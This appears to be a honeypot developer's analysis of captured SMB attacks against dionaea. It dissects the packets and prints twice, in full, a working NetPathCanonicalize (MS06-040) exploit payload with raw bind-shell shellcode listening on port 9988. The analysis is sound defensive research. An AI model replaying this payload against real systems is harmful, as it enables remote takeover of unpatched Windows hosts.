Attacks which are identified correctly are rather boring, failing attacks are interesting, as they provide some more information on the problem.
This attack came to our attention, as threw a exception in dionaea:
EOFError at EOFError()
/opt/dionaea/lib/dionaea/python/dionaea/ndrlib.py:109 in unpack_long
raise EOFError
/opt/dionaea/lib/dionaea/python/dionaea/ndrlib.py:119 in unpack_string
mc = self.unpack_long()
/opt/dionaea/lib/dionaea/python/dionaea/smb/rpcservices.py:2779 in handle_NetPathCanonicalize
server_unc = x.unpack_string()
/opt/dionaea/lib/dionaea/python/dionaea/smb/rpcservices.py:83 in processrequest
data = method(con, p)
/opt/dionaea/lib/dionaea/python/dionaea/smb/smb.py:606 in process_dcerpc_packet
resp = service.processrequest(service, self, dcep.OpNum, dcep)
So, I was provided with the required bistream to have a look on what was going wrong.
Initally replaying the bistream was a problem, as there were many smb commands in a singel chunk, after some changes to the code, replaying worked out. Even though I had the same exception showing up, the attack seemed to be successful as shellcode was detected and emulated, which resulted in a open port on tcp/9988.
2010-11-12 09:34:34
connection 705 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:54255 (705 None)
dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
connection 706 emulation tcp listen 0.0.0.0:9988 (705 705)
So I was curious why this attack worked out, even though dionaea failed to reply properly for some smb requests.
Looking at the initial SMB Negotiate … while the dialects offered for negotiation looked rather unsuspicious, the attacker provided a very limited set of features in Flags2, the Windows smb stack offers at least UNICODE support,
###[ NBT Session Packet sizeof(4) ]###
TYPE = Session Message sizeof( 1) off= 0 goff= 0
RESERVED = 0 sizeof( 1) off= 1 goff= 1
LENGTH = 168 sizeof( 2) off= 2 goff= 2
###[ SMB Header sizeof(32) ]###
Start = b'\xffSMB' sizeof( 4) off= 0 goff= 4
Command = SMB_COM_NEGOTIATE sizeof( 1) off= 4 goff= 8
Status = 0 sizeof( 4) off= 5 goff= 9
Flags = CASES_ENSITIVITY sizeof( 1) off= 9 goff= 13
Flags2 = KNOWS_LONG_NAMES+ERR_STATUS sizeof( 2) off= 10 goff= 14
PIDHigh = 0 sizeof( 2) off= 12 goff= 16
Signature = 0 sizeof( 8) off= 14 goff= 18
Unused = 0 sizeof( 2) off= 22 goff= 26
TID = 0 sizeof( 2) off= 24 goff= 28
PID = 1564 sizeof( 2) off= 26 goff= 30
UID = 0 sizeof( 2) off= 28 goff= 32
MID = 10960 sizeof( 2) off= 30 goff= 34
###[ SMB Negociate_Protocol_Request_Counts sizeof(136) ]###
WordCount = 0 sizeof( 1) off= 0 goff= 36
ByteCount = 133 sizeof( 2) off= 1 goff= 37
\Requests \
|###[ SMB Negociate Protocol Request Tail sizeof(24) ]###
| BufferFormat = 2 sizeof( 1) off= 0 goff= 39
| BufferData = b'PC NETWORK PROGRAM 1.0\x00' sizeof( 23) off= 1 goff= 40
|###[ SMB Negociate Protocol Request Tail sizeof(25) ]###
| BufferFormat = 2 sizeof( 1) off= 0 goff= 39
| BufferData = b'MICROSOFT NETWORKS 1.03\x00' sizeof( 24) off= 1 goff= 40
|###[ SMB Negociate Protocol Request Tail sizeof(24) ]###
| BufferFormat = 2 sizeof( 1) off= 0 goff= 39
| BufferData = b'MICROSOFT NETWORKS 3.0\x00' sizeof( 23) off= 1 goff= 40
|###[ SMB Negociate Protocol Request Tail sizeof(11) ]###
| BufferFormat = 2 sizeof( 1) off= 0 goff= 39
| BufferData = b'LANMAN1.0\x00' sizeof( 10) off= 1 goff= 40
|###[ SMB Negociate Protocol Request Tail sizeof(11) ]###
| BufferFormat = 2 sizeof( 1) off= 0 goff= 39
| BufferData = b'LM1.2X002\x00' sizeof( 10) off= 1 goff= 40
|###[ SMB Negociate Protocol Request Tail sizeof(11) ]###
| BufferFormat = 2 sizeof( 1) off= 0 goff= 39
| BufferData = b'LANMAN2.1\x00' sizeof( 10) off= 1 goff= 40
|###[ SMB Negociate Protocol Request Tail sizeof(15) ]###
| BufferFormat = 2 sizeof( 1) off= 0 goff= 39
| BufferData = b'NT LANMAN 1.0\x00' sizeof( 14) off= 1 goff= 40
|###[ SMB Negociate Protocol Request Tail sizeof(12) ]###
| BufferFormat = 2 sizeof( 1) off= 0 goff= 39
| BufferData = b'NT LM 0.12\x00' sizeof( 11) off= 1 goff= 40
The Sessionsetup Request tried to login as ADMIN:
###[ SMB Sessionsetup AndX Request2 sizeof(168) ]###
WordCount = 13 sizeof( 1) off= 0 goff= 36
AndXCommand = SMB_COM_NONE sizeof( 1) off= 1 goff= 37
AndXReserved = 0 sizeof( 1) off= 2 goff= 38
AndXOffset = 0 sizeof( 2) off= 3 goff= 39
MaxBufferSize = 17408 sizeof( 2) off= 5 goff= 41
MaxMPXCount = 2 sizeof( 2) off= 7 goff= 43
VCNumber = 2556 sizeof( 2) off= 9 goff= 45
SessionKey = 0 sizeof( 4) off= 11 goff= 47
PasswordLength = 24 sizeof( 2) off= 15 goff= 51
UnicodePasswordLength= 24 sizeof( 2) off= 17 goff= 53
Reserved2 = 0 sizeof( 4) off= 19 goff= 55
Capabilties = NT_SMBS+RPC_REMOTE_APIS+STATUS32+LEVEL_II_OPLOCKS sizeof( 4) off= 23 goff= 59
ByteCount = 91 sizeof( 2) off= 27 goff= 63
Password = b'\xa8\xa7\xc0]\xc8\xb7\x7f\xde\xa9\xb2Y\xacWRyux\xd3\x8f1\x06?|)' sizeof( 24) off= 29 goff= 65
UnicodePassword = b'\x1f\x08Oh8\xb4Y\x95\xaa(J\x18o\x89,&G\x99\xc8\x99\xe7MZ\x05' sizeof( 24) off= 53 goff= 89
Account = b'ADMIN\x00' sizeof( 6) off= 77 goff=113
PrimaryDomain = b' \x00' sizeof( 2) off= 83 goff=119
NativeOS = b'Windows 2000 2195\x00' sizeof( 18) off= 85 goff=121
NativeLanManager = b'Windows 2000 5.0\x00' sizeof( 17) off=103 goff=139
Extrabytes = b'\x00' sizeof( 48) off=120 goff=156
Treeconnect would try to connect to \\*SMBSERVER\IPC$, which is a first hint on the toolkit used to run the attack Impacket, but by default impacket does only negotiate NT LM 0.12 as dialect.
###[ SMB Treeconnect AndX Request sizeof(36) ]###
WordCount = 4 sizeof( 1) off= 0 goff= 36
AndXCommand = SMB_COM_NONE sizeof( 1) off= 1 goff= 37
Reserved1 = 0 sizeof( 1) off= 2 goff= 38
AndXOffset = 0 sizeof( 2) off= 3 goff= 39
Flags = 0x0 sizeof( 2) off= 5 goff= 41
PasswordLength = 1 sizeof( 2) off= 7 goff= 43
ByteCount = 25 sizeof( 2) off= 9 goff= 45
Password = b'\x00' sizeof( 1) off= 11 goff= 47
Path = b'\\\\*SMBSERVER\\IPC$\x00' sizeof( 18) off= 12 goff= 48
Service = b'?????\x00' sizeof( 6) off= 30 goff= 66
Extrabytes = b'\x00' sizeof( 0) off= 36 goff= 72
NTcreate \\srvsvc was rather innocent, but …
###[ SMB NTcreate AndX Request sizeof(59) ]###
WordCount = 24 sizeof( 1) off= 0 goff= 36
AndXCommand = SMB_COM_NONE sizeof( 1) off= 1 goff= 37
Reserved1 = 0 sizeof( 1) off= 2 goff= 38
AndXOffset = 0 sizeof( 2) off= 3 goff= 39
Reserved2 = 0 sizeof( 1) off= 5 goff= 41
FilenameLen = 7 sizeof( 2) off= 6 goff= 42
CreateFlags = 0x00000002+EXCL_OPLOCK+CREATE_DIRECTORY sizeof( 4) off= 8 goff= 44
RootFID = 0x0 sizeof( 4) off= 12 goff= 48
AccessMask = READ+WRITE+APPEND+READ_EA+WRITE_EA+READ_ATTR+WRITE_ATTR+READ_CTRL sizeof( 4) off= 16 goff= 52
AllocationSize = 0 sizeof( 8) off= 20 goff= 56
FileAttributes = 0x00000000 sizeof( 4) off= 28 goff= 64
ShareAccess = READ+WRITE+DELETE sizeof( 4) off= 32 goff= 68
Disposition = 1 sizeof( 4) off= 36 goff= 72
CreateOptions = NONDIRECTORY sizeof( 4) off= 40 goff= 76
Impersonation = 2 sizeof( 4) off= 44 goff= 80
SecurityFlags = 0x00 sizeof( 1) off= 48 goff= 84
ByteCount = 8 sizeof( 2) off= 49 goff= 85
Filename = b'\\srvsvc\x00' sizeof( 8) off= 51 goff= 87
Extrabytes = b'' sizeof( 0) off= 59 goff= 95
The following Trans requested to bind SRVSVC.
###[ SMB Trans Request sizeof(42) ]###
WordCount = 16 sizeof( 1) off= 0 goff= 36
TotalParamCount = 0 sizeof( 2) off= 1 goff= 37
TotalDataCount = 72 sizeof( 2) off= 3 goff= 39
MaxParamCount = 1024 sizeof( 2) off= 5 goff= 41
MaxDataCount = 65504 sizeof( 2) off= 7 goff= 43
MaxSetupCount = 0 sizeof( 1) off= 9 goff= 45
Reserved1 = 0 sizeof( 1) off= 10 goff= 46
Flags = 0x0 sizeof( 2) off= 11 goff= 47
Timeout = 0 sizeof( 4) off= 13 goff= 49
Reserved2 = 0 sizeof( 2) off= 17 goff= 53
ParamCount = 0 sizeof( 2) off= 19 goff= 55
ParamOffset = 74 sizeof( 2) off= 21 goff= 57
DataCount = 72 sizeof( 2) off= 23 goff= 59
DataOffset = 74 sizeof( 2) off= 25 goff= 61
SetupCount = 2 sizeof( 1) off= 27 goff= 63
Reserved3 = 0 sizeof( 1) off= 28 goff= 64
Setup = [9728,64] sizeof( 4) off= 29 goff= 65
ByteCount = 79 sizeof( 2) off= 33 goff= 69
TransactionName = b'\\PIPE\\\x00' sizeof( 7) off= 35 goff= 71
Pad = b'' sizeof( 0) off= 42 goff= 78
Param = [] sizeof( 0) off= 42 goff= 78
Pad1 = b'' sizeof( 0) off= 42 goff= 78
###[ DCERPC Header sizeof(16) ]###
Version = 5 sizeof( 1) off= 0 goff= 78
VersionMinor = 0 sizeof( 1) off= 1 goff= 79
PacketType = Bind sizeof( 1) off= 2 goff= 80
PacketFlags = 0x3 sizeof( 1) off= 3 goff= 81
DataRepresentation = 16 sizeof( 4) off= 4 goff= 82
FragLen = 72 sizeof( 2) off= 8 goff= 86
AuthLen = 0 sizeof( 2) off= 10 goff= 88
CallID = 0 sizeof( 4) off= 12 goff= 90
###[ DCERPC Bind sizeof(56) ]###
MaxTransmitFrag = 5840 sizeof( 2) off= 0 goff= 94
MaxReceiveFrag = 5840 sizeof( 2) off= 2 goff= 96
AssocGroup = 0x0 sizeof( 4) off= 4 goff= 98
NumCtxItems = 1 sizeof( 1) off= 8 goff=102
FixGap = b'\x00\x00\x00' sizeof( 3) off= 9 goff=103
\CtxItems \
|###[ DCERPC CtxItem sizeof(44) ]###
| ContextID = 0 sizeof( 2) off= 0 goff=106
| NumTransItems = 1 sizeof( 1) off= 2 goff=108
| FixGap = 0 sizeof( 1) off= 3 goff=109
| UUID = 4b324fc8-1670-01d3-1278-5a47bf6ee188 sizeof( 16) off= 4 goff=110
| InterfaceVer = 3 sizeof( 2) off= 20 goff=126
| InterfaceVerMinor = 0 sizeof( 2) off= 22 goff=128
| TransferSyntax = 8a885d04-1ceb-11c9-9fe8-08002b104860 sizeof( 16) off= 24 goff=130
| TransferSyntaxVersion= 2 sizeof( 4) off= 40 goff=146
Now, I was awaiting a call on SRVSVC, and the attacker issued a Write.
###[ SMB Write AndX Request sizeof(827) ]###
WordCount = 14 sizeof( 1) off= 0 goff= 36
AndXCommand = SMB_COM_NONE sizeof( 1) off= 1 goff= 37
AndXReserved = 0 sizeof( 1) off= 2 goff= 38
AndXOffset = 0 sizeof( 2) off= 3 goff= 39
FID = 0x4000 sizeof( 2) off= 5 goff= 41
Offset = 0 sizeof( 4) off= 7 goff= 43
Reserved2 = 0xffffffff sizeof( 4) off= 11 goff= 47
WriteMode = MSGSTART sizeof( 2) off= 15 goff= 51
Remaining = 796 sizeof( 2) off= 17 goff= 53
DataLenHigh = 0 sizeof( 2) off= 19 goff= 55
DataLenLow = 796 sizeof( 2) off= 21 goff= 57
DataOffset = 63 sizeof( 2) off= 23 goff= 59
HighOffset = 0 sizeof( 4) off= 25 goff= 61
ByteCount = 796 sizeof( 2) off= 29 goff= 65
Padding = b'' sizeof( 0) off= 31 goff= 67
Data = b"\x05\x00\x00\x01\x10\x00\x00\x00\x1c\x03\x00\x00\x00\x00\x00\x00\x04\x03\x00\x00\x00\x00\x1f\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00c\x01\x00\x00\x81\xc4\xff\xef\xff\xffD\x8b\xec\xeb\x02\xebk\xe8\xf9\xff\xff\xffSUVW\x8bl$\x18\x8bE<\x8bT(x\x03\xd5\x8bJ\x18\x8bZ \x03\xdd\xe32I\x8b4\x8b\x03\xf53\xff\xfc3\xc0\xac8\xe0t\x07\xc1\xcf\r\x03\xf8\xeb\xf2;|$\x14u\xe1\x8bZ$\x03\xddf\x8b\x0cK\x8bZ\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xeb\x023\xc0_^][\x89D$\x04\x8b\x04$\x89D$\x08\x8bD$\x04\x83\xc4\x08\xc33\xc0d\x03@0\x8b@\x0c\x8bp\x1c\xad\x8bx\x08^3\xc0Ph.exe\x89e\x14Wh\xeaI\x8a\xe8\xff\xd6j\x06\xffu\x14\xff\xd0\x89E\x04Wh\xdb\x8a#\xe9\xff\xd6\x89E\x0cWh\x8eN\x0e\xec\xff\xd63\xc9f\xb9llQh32.dhws2_T\xff\xd0\x8b\xd8Sh\xb6\x19\x18\xe7\xff\xd6\x89E\x10Sh\xe7y\xc6y\xff\xd6\x89E\x18Shn\x0b/I\xff\xd6j\x06j\x01j\x02\xff\xd0\x89E\x003\xc0PPP\xb8\x02\xff'\x04\x80\xf4\xffP\x8b\xc4j\x10P\xffu\x00Sh\xa4\x1ap\xc7\xff\xd6\xff\xd0PSh\xa4\xad.\xe9\xff\xd6\xffu\x00\xff\xd0PP\xffu\x00Sh\xe5I\x86I\xff\xd6\xff\xd0\x89E\x00\x81\xc4\xfc\xfe\xff\xff\x8b\xdc3\xc9Q\xb1\xffQS\xffu\x00\xffU\x10\x85\xc0~\nPS\xffu\x04\xffU\x0c\xeb\xe5Wh[L\x1a\xdd\xff\xd6\xffu\x04\xff\xd03\xc0P\xffu\x14Wh\x98\xfe\x8a\x0e\xff\xd6\xff\xd0Wh\xef\xce\xe0`\xff\xd6\xff\xd0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\x08\x02\x00AAAAAAAA\x04\x08\x02\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x04\x08\x02\x00AAAAAAAA\x04\x08\x02\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00\x00\x00\xd7\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xcb\x00\x00\x00\x00\x00\x00\x00" sizeof(796) off= 31 goff= 67
The Data resemebled to a DCERPRC request, opnum 31 on SRVSVC, which is NetPathCanonicalize, so this was either MS08-067 or MS06-040, depending on the arguments provided.
###[ DCERPC Header sizeof(16) ]###
Version = 5 sizeof( 1) off= 0 goff= 0
VersionMinor = 0 sizeof( 1) off= 1 goff= 1
PacketType = Request sizeof( 1) off= 2 goff= 2
PacketFlags = 0x1 sizeof( 1) off= 3 goff= 3
DataRepresentation = 16 sizeof( 4) off= 4 goff= 4
FragLen = 796 sizeof( 2) off= 8 goff= 8
AuthLen = 0 sizeof( 2) off= 10 goff= 10
CallID = 0 sizeof( 4) off= 12 goff= 12
###[ DCERPC Request sizeof(780) ]###
AllocHint = 772 sizeof( 4) off= 0 goff= 16
ContextID = 0 sizeof( 2) off= 4 goff= 20
OpNum = 31 sizeof( 2) off= 6 goff= 22
StubData = b"\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00c\x01\x00\x00\x81\xc4\xff\xef\xff\xffD\x8b\xec\xeb\x02\xebk\xe8\xf9\xff\xff\xffSUVW\x8bl$\x18\x8bE<\x8bT(x\x03\xd5\x8bJ\x18\x8bZ \x03\xdd\xe32I\x8b4\x8b\x03\xf53\xff\xfc3\xc0\xac8\xe0t\x07\xc1\xcf\r\x03\xf8\xeb\xf2;|$\x14u\xe1\x8bZ$\x03\xddf\x8b\x0cK\x8bZ\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xeb\x023\xc0_^][\x89D$\x04\x8b\x04$\x89D$\x08\x8bD$\x04\x83\xc4\x08\xc33\xc0d\x03@0\x8b@\x0c\x8bp\x1c\xad\x8bx\x08^3\xc0Ph.exe\x89e\x14Wh\xeaI\x8a\xe8\xff\xd6j\x06\xffu\x14\xff\xd0\x89E\x04Wh\xdb\x8a#\xe9\xff\xd6\x89E\x0cWh\x8eN\x0e\xec\xff\xd63\xc9f\xb9llQh32.dhws2_T\xff\xd0\x8b\xd8Sh\xb6\x19\x18\xe7\xff\xd6\x89E\x10Sh\xe7y\xc6y\xff\xd6\x89E\x18Shn\x0b/I\xff\xd6j\x06j\x01j\x02\xff\xd0\x89E\x003\xc0PPP\xb8\x02\xff'\x04\x80\xf4\xffP\x8b\xc4j\x10P\xffu\x00Sh\xa4\x1ap\xc7\xff\xd6\xff\xd0PSh\xa4\xad.\xe9\xff\xd6\xffu\x00\xff\xd0PP\xffu\x00Sh\xe5I\x86I\xff\xd6\xff\xd0\x89E\x00\x81\xc4\xfc\xfe\xff\xff\x8b\xdc3\xc9Q\xb1\xffQS\xffu\x00\xffU\x10\x85\xc0~\nPS\xffu\x04\xffU\x0c\xeb\xe5Wh[L\x1a\xdd\xff\xd6\xffu\x04\xff\xd03\xc0P\xffu\x14Wh\x98\xfe\x8a\x0e\xff\xd6\xff\xd0Wh\xef\xce\xe0`\xff\xd6\xff\xd0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\x08\x02\x00AAAAAAAA\x04\x08\x02\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x04\x08\x02\x00AAAAAAAA\x04\x08\x02\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00\x00\x00\xd7\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xcb\x00\x00\x00\x00\x00\x00\x00" sizeof(772) off= 8 goff= 24
But, even though the attacker already sent his shellcode, and dionaea did not reply to the NetPathCanonicalize call, he would continue to sent requests on SRVSVC/NetPathCanonicalize, including this one:
###[ DCERPC Header sizeof(16) ]###
Version = 5 sizeof( 1) off= 0 goff= 78
VersionMinor = 0 sizeof( 1) off= 1 goff= 79
PacketType = Request sizeof( 1) off= 2 goff= 80
PacketFlags = 0x2 sizeof( 1) off= 3 goff= 81
DataRepresentation = 16 sizeof( 4) off= 4 goff= 82
FragLen = 28 sizeof( 2) off= 8 goff= 86
AuthLen = 0 sizeof( 2) off= 10 goff= 88
CallID = 0 sizeof( 4) off= 12 goff= 90
###[ DCERPC Request sizeof(12) ]###
AllocHint = 4 sizeof( 4) off= 0 goff= 94
ContextID = 0 sizeof( 2) off= 4 goff= 98
OpNum = 31 sizeof( 2) off= 6 goff=100
StubData = b'\x00\x00\x00\x00' sizeof( 4) off= 8 goff=102
This is the request dionaea would fail to parse properly, as the StubData is way too short for a proper call to NetPathCanonicalize.
According to virustotal the malware is allaple, or something else. Allaple may be correct, as the vulnerability used is MS06-040 (after looking at the arguments provided to NetPathCanonicalize, MS08-067 needs some .. to trigger the bug).
I was unable to get pcap traces for Allaple to compare with, or a detailed reverse engeneering, but I'm pretty confident the exploit allaple sends is static chunks gathered from using impacket.
The plain ascii SMBSERVER string from the previous outlined attack was easy to grep for, and Tillmann came back with some other attack with similar characteristics … basically it matched the grep.
Zero Flags, zero Flags2, only NT LM 0.12 offered as dialect, maybe impacket?
###[ NBT Session Packet sizeof(4) ]###
TYPE = Session Message sizeof( 1) off= 0 goff= 0
RESERVED = 0 sizeof( 1) off= 1 goff= 1
LENGTH = 47 sizeof( 2) off= 2 goff= 2
###[ SMB Header sizeof(32) ]###
Start = b'\xffSMB' sizeof( 4) off= 0 goff= 4
Command = SMB_COM_NEGOTIATE sizeof( 1) off= 4 goff= 8
Status = 0 sizeof( 4) off= 5 goff= 9
Flags = 0x00 sizeof( 1) off= 9 goff= 13
Flags2 = 0x0000 sizeof( 2) off= 10 goff= 14
PIDHigh = 0 sizeof( 2) off= 12 goff= 16
Signature = 0 sizeof( 8) off= 14 goff= 18
Unused = 0 sizeof( 2) off= 22 goff= 26
TID = 0 sizeof( 2) off= 24 goff= 28
PID = 10948 sizeof( 2) off= 26 goff= 30
UID = 0 sizeof( 2) off= 28 goff= 32
MID = 0 sizeof( 2) off= 30 goff= 34
###[ SMB Negociate_Protocol_Request_Counts sizeof(15) ]###
WordCount = 0 sizeof( 1) off= 0 goff= 36
ByteCount = 12 sizeof( 2) off= 1 goff= 37
\Requests \
|###[ SMB Negociate Protocol Request Tail sizeof(12) ]###
| BufferFormat = 2 sizeof( 1) off= 0 goff= 39
| BufferData = b'NT LM 0.12\x00' sizeof( 11) off= 1 goff= 40
SessionSetup offered nt and pysmb as NativeOS and NativeLanManager, this was likely impacket, as impacket builds upon pysmb.
###[ SMB Sessionsetup AndX Request2 sizeof(40) ]###
WordCount = 13 sizeof( 1) off= 0 goff= 36
AndXCommand = SMB_COM_NONE sizeof( 1) off= 1 goff= 37
AndXReserved = 0 sizeof( 1) off= 2 goff= 38
AndXOffset = 0 sizeof( 2) off= 3 goff= 39
MaxBufferSize = 65535 sizeof( 2) off= 5 goff= 41
MaxMPXCount = 2 sizeof( 2) off= 7 goff= 43
VCNumber = 10948 sizeof( 2) off= 9 goff= 45
SessionKey = 0 sizeof( 4) off= 11 goff= 47
PasswordLength = 0 sizeof( 2) off= 15 goff= 51
UnicodePasswordLength= 0 sizeof( 2) off= 17 goff= 53
Reserved2 = 0 sizeof( 4) off= 19 goff= 55
Capabilties = RAW_MODE sizeof( 4) off= 23 goff= 59
ByteCount = 11 sizeof( 2) off= 27 goff= 63
Password = b'' sizeof( 0) off= 29 goff= 65
UnicodePassword = b'' sizeof( 0) off= 29 goff= 65
Account = b'\x00' sizeof( 1) off= 29 goff= 65
PrimaryDomain = b'\x00' sizeof( 1) off= 30 goff= 66
NativeOS = b'nt\x00' sizeof( 3) off= 31 goff= 67
NativeLanManager = b'pysmb\x00' sizeof( 6) off= 34 goff= 70
Extrabytes = b'' sizeof( 0) off= 40 goff= 76
Treeconnect on \\*SMBSERVER\IPC$, impacket default:
###[ SMB Treeconnect AndX Request sizeof(36) ]###
WordCount = 4 sizeof( 1) off= 0 goff= 36
AndXCommand = SMB_COM_NONE sizeof( 1) off= 1 goff= 37
Reserved1 = 0 sizeof( 1) off= 2 goff= 38
AndXOffset = 0 sizeof( 2) off= 3 goff= 39
Flags = 0x0 sizeof( 2) off= 5 goff= 41
PasswordLength = 1 sizeof( 2) off= 7 goff= 43
ByteCount = 25 sizeof( 2) off= 9 goff= 45
Password = b'\x00' sizeof( 1) off= 11 goff= 47
Path = b'\\\\*SMBSERVER\\IPC$\x00' sizeof( 18) off= 12 goff= 48
Service = b'?????\x00' sizeof( 6) off= 30 goff= 66
Extrabytes = b'' sizeof( 0) off= 36 goff= 72
NTcreate spoolss - I was already hoping for this to be a MS10-061 …
###[ SMB NTcreate AndX Request sizeof(59) ]###
WordCount = 24 sizeof( 1) off= 0 goff= 36
AndXCommand = SMB_COM_NONE sizeof( 1) off= 1 goff= 37
Reserved1 = 0 sizeof( 1) off= 2 goff= 38
AndXOffset = 0 sizeof( 2) off= 3 goff= 39
Reserved2 = 0 sizeof( 1) off= 5 goff= 41
FilenameLen = 7 sizeof( 2) off= 6 goff= 42
CreateFlags = 0x00000002+EXCL_OPLOCK+CREATE_DIRECTORY sizeof( 4) off= 8 goff= 44
RootFID = 0x0 sizeof( 4) off= 12 goff= 48
AccessMask = READ+WRITE+APPEND+READ_EA+WRITE_EA+READ_ATTR+WRITE_ATTR+READ_CTRL sizeof( 4) off= 16 goff= 52
AllocationSize = 0 sizeof( 8) off= 20 goff= 56
FileAttributes = 0x00000000 sizeof( 4) off= 28 goff= 64
ShareAccess = READ+WRITE sizeof( 4) off= 32 goff= 68
Disposition = 1 sizeof( 4) off= 36 goff= 72
CreateOptions = NONDIRECTORY sizeof( 4) off= 40 goff= 76
Impersonation = 2 sizeof( 4) off= 44 goff= 80
SecurityFlags = CTX_TRACKING+EFFECTIVE_ONLY sizeof( 1) off= 48 goff= 84
ByteCount = 8 sizeof( 2) off= 49 goff= 85
Filename = b'spoolss\x00' sizeof( 8) off= 51 goff= 87
Extrabytes = b'' sizeof( 0) off= 59 goff= 95
Trans to bind spoolss:
###[ SMB Trans Request sizeof(42) ]###
WordCount = 16 sizeof( 1) off= 0 goff= 36
TotalParamCount = 0 sizeof( 2) off= 1 goff= 37
TotalDataCount = 72 sizeof( 2) off= 3 goff= 39
MaxParamCount = 1024 sizeof( 2) off= 5 goff= 41
MaxDataCount = 65504 sizeof( 2) off= 7 goff= 43
MaxSetupCount = 0 sizeof( 1) off= 9 goff= 45
Reserved1 = 0 sizeof( 1) off= 10 goff= 46
Flags = 0x0 sizeof( 2) off= 11 goff= 47
Timeout = 0 sizeof( 4) off= 13 goff= 49
Reserved2 = 0 sizeof( 2) off= 17 goff= 53
ParamCount = 0 sizeof( 2) off= 19 goff= 55
ParamOffset = 74 sizeof( 2) off= 21 goff= 57
DataCount = 72 sizeof( 2) off= 23 goff= 59
DataOffset = 74 sizeof( 2) off= 25 goff= 61
SetupCount = 2 sizeof( 1) off= 27 goff= 63
Reserved3 = 0 sizeof( 1) off= 28 goff= 64
Setup = [9728,1920] sizeof( 4) off= 29 goff= 65
ByteCount = 79 sizeof( 2) off= 33 goff= 69
TransactionName = b'\\PIPE\\\x00' sizeof( 7) off= 35 goff= 71
Pad = b'' sizeof( 0) off= 42 goff= 78
Param = [] sizeof( 0) off= 42 goff= 78
Pad1 = b'' sizeof( 0) off= 42 goff= 78
###[ DCERPC Header sizeof(16) ]###
Version = 5 sizeof( 1) off= 0 goff= 78
VersionMinor = 0 sizeof( 1) off= 1 goff= 79
PacketType = Bind sizeof( 1) off= 2 goff= 80
PacketFlags = 0x3 sizeof( 1) off= 3 goff= 81
DataRepresentation = 16 sizeof( 4) off= 4 goff= 82
FragLen = 72 sizeof( 2) off= 8 goff= 86
AuthLen = 0 sizeof( 2) off= 10 goff= 88
CallID = 1 sizeof( 4) off= 12 goff= 90
###[ DCERPC Bind sizeof(56) ]###
MaxTransmitFrag = 4280 sizeof( 2) off= 0 goff= 94
MaxReceiveFrag = 4280 sizeof( 2) off= 2 goff= 96
AssocGroup = 0x0 sizeof( 4) off= 4 goff= 98
NumCtxItems = 1 sizeof( 1) off= 8 goff=102
FixGap = b'\x00\x00\x00' sizeof( 3) off= 9 goff=103
\CtxItems \
|###[ DCERPC CtxItem sizeof(44) ]###
| ContextID = 0 sizeof( 2) off= 0 goff=106
| NumTransItems = 1 sizeof( 1) off= 2 goff=108
| FixGap = 0 sizeof( 1) off= 3 goff=109
| UUID = 12345678-1234-abcd-ef00-0123456789ab sizeof( 16) off= 4 goff=110
| InterfaceVer = 1 sizeof( 2) off= 20 goff=126
| InterfaceVerMinor = 0 sizeof( 2) off= 22 goff=128
| TransferSyntax = 8a885d04-1ceb-11c9-9fe8-08002b104860 sizeof( 16) off= 24 goff=130
| TransferSyntaxVersion= 2 sizeof( 4) off= 40 goff=146
Trans to call EnumPrinters:
###[ SMB Trans Request sizeof(42) ]###
WordCount = 16 sizeof( 1) off= 0 goff= 36
TotalParamCount = 0 sizeof( 2) off= 1 goff= 37
TotalDataCount = 48 sizeof( 2) off= 3 goff= 39
MaxParamCount = 1024 sizeof( 2) off= 5 goff= 41
MaxDataCount = 65504 sizeof( 2) off= 7 goff= 43
MaxSetupCount = 0 sizeof( 1) off= 9 goff= 45
Reserved1 = 0 sizeof( 1) off= 10 goff= 46
Flags = 0x0 sizeof( 2) off= 11 goff= 47
Timeout = 0 sizeof( 4) off= 13 goff= 49
Reserved2 = 0 sizeof( 2) off= 17 goff= 53
ParamCount = 0 sizeof( 2) off= 19 goff= 55
ParamOffset = 74 sizeof( 2) off= 21 goff= 57
DataCount = 48 sizeof( 2) off= 23 goff= 59
DataOffset = 74 sizeof( 2) off= 25 goff= 61
SetupCount = 2 sizeof( 1) off= 27 goff= 63
Reserved3 = 0 sizeof( 1) off= 28 goff= 64
Setup = [9728,1920] sizeof( 4) off= 29 goff= 65
ByteCount = 55 sizeof( 2) off= 33 goff= 69
TransactionName = b'\\PIPE\\\x00' sizeof( 7) off= 35 goff= 71
